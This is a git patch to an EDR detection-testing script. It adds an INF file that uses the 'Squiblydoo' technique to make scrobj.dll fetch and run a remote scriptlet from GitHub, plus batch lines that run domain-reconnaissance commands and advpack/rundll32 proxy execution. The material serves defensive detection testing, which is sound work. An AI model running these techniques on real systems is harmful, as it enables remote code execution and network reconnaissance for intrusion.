From 60ce49b70ad22c5474efa32a344fbe9f0707f556 Mon Sep 17 00:00:00 2001 From: op7ic <3172590+op7ic@users.noreply.github.com> Date: Mon, 16 Jul 2018 15:05:59 +0100 Subject: [PATCH] update --- Payloads/calc.inf | 8 ++++++++ runtests.bat | 10 +++++++--- 2 files changed, 15 insertions(+), 3 deletions(-) create mode 100644 Payloads/calc.inf diff --git a/Payloads/calc.inf b/Payloads/calc.inf new file mode 100644 index 0000000..4ed40e4 --- /dev/null +++ b/Payloads/calc.inf @@ -0,0 +1,8 @@ +[Version] +Signature=$CHICAGO$ + +[DefaultInstall] +UnregisterDlls = Squiblydoo + +[Squiblydoo] +11,,scrobj.dll,2,60,https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct \ No newline at end of file diff --git a/runtests.bat b/runtests.bat index c3b5fc6..ebbd5d1 100644 --- a/runtests.bat +++ b/runtests.bat @@ -265,13 +265,15 @@ echo Command Excuted: for /f "tokens=1,2 delims= " %A in ('tasklist /fi ^"Image echo Execution Finished at %time% %date% sleep 3 echo %time% %date% [+] T1033 - System Owner/User Discovery -start "" cmd.exe /C whoami +start "" cmd.exe /c whoami start "" wmic useraccount get /ALL -start "" cmd.exe /C net group "domain administrators" /domain +start "" cmd.exe /c net group "domain administrators" /domain +start "" cmd.exe /c whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1 echo Execution Finished at %time% %date% echo Command Excuted: cmd.exe /C whoami echo Command Excuted: wmic useraccount get /ALL echo Command Excuted: cmd.exe /C net group "domain administrators" /domain + sleep 3 echo %time% %date% [+] T1158 - Hiding data in ADS echo "test123 > 12.txt @@ -393,12 +395,14 @@ echo Command Excuted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe /out echo Command Excuted: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe /out:payload.exe payload.cs echo Command Excuted: payload.exe -echo %time% %date% [+] Testing advpack via rundll32 exec +echo %time% %date% [+] Testing advpack exec start "" cmd /c rundll32.exe advpack.dll,RegisterOCX calc.exe echo Execution Finished at %time% %date% echo Command Excuted: rundll32.exe advpack.dll,RegisterOCX calc.exe + echo [+] Let tasks finish before killing all the files + sleep 90 echo [+] Cleanup